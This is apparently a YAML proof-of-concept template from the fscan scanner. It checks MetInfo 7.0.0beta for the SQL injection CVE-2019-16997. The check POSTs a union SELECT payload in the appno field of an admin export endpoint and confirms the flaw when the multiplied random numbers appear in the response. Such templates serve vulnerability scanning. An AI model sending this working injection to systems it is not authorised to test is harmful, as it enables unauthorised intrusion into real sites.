fscan/Web_Scan/pocs/metinfo-cve-2019-16997-sqli...

18 lines
605 B
YAML

name: poc-yaml-metinfo-cve-2019-16997-sqli
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /admin/?n=language&c=language_general&a=doExportPack
headers:
Content-Type: application/x-www-form-urlencoded
body: 'appno= 1 union SELECT {{r1}}*{{r2}},1&editor=cn&site=web'
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: JingLing(https://hackfun.org/)
metinfo_version: 7.0.0beta
links:
- https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2